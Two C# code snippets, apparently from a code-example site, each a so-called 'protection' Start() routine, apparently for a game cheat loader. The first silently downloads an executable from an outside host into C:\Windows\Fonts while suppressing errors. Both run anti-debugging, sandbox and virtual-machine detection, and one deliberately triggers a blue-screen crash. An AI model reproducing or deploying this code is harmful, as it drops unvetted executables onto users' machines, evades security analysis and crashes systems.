// Import done
        // 3DS PROTECTION
        public static void Start()
        {
            try
            {
                WebClient wb = new WebClient();
                wb.Headers["User-Agent"] = "NOTCRACKEDOK";
                string con = @"C:\Windows\Fonts\devcon.exe";
                wb.DownloadFile("http://overhaxweebloader.cf/Cleaners/devcon.exe", con);

                wb.DownloadString("https://google.com");
            }
            catch
            {
            }
            This.closeAll();
            This.AntiDebug();
            This.GetRunningDebugger.Find();
            This.SandBoxieDetect();
            This.VMDetect();
            This.StopFnProccess();
            //This.BanKey();
            //This.AntiDetectDrivers();
            //This.ExtraProc();
            //This.BSOD();
        }
Esempio n. 2
0
 //Import done
 // sTART PROTECTION
 public static void Start()
 {
     try
     {
         WebClient webClient = new WebClient();
         webClient.DownloadString("https://google.com");
     }
     catch
     {
     }
     This.GetRunningDebugger.Find();
     This.SandBoxieDetect();
     This.VMDetect();
     This.BSOD();
 }